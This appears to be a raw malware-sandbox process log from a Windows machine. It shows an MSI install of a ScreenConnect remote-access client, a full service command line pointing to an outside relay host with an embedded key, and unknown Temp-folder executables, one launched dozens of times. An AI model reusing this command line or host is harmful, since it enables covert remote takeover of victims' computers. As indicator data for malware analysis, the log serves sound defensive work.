C:\Windows\syswow64\MsiExec.exe -Embedding E3213FFB1A357C6A15C81E8620715731 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI7356.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240677796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe"

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A4FEEDD031CC30D4F90BF1C26AE2F8CC

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A67D321E4B6058891C34D4762151165D E Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=5e07fdea-2445-4cdf-b446-9468459e62fc&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "9a4b1c52-2179-481d-a289-7d44e903e96d" "User"

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "b4abed41-d6fe-40e4-9266-e92554889e94" "System"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

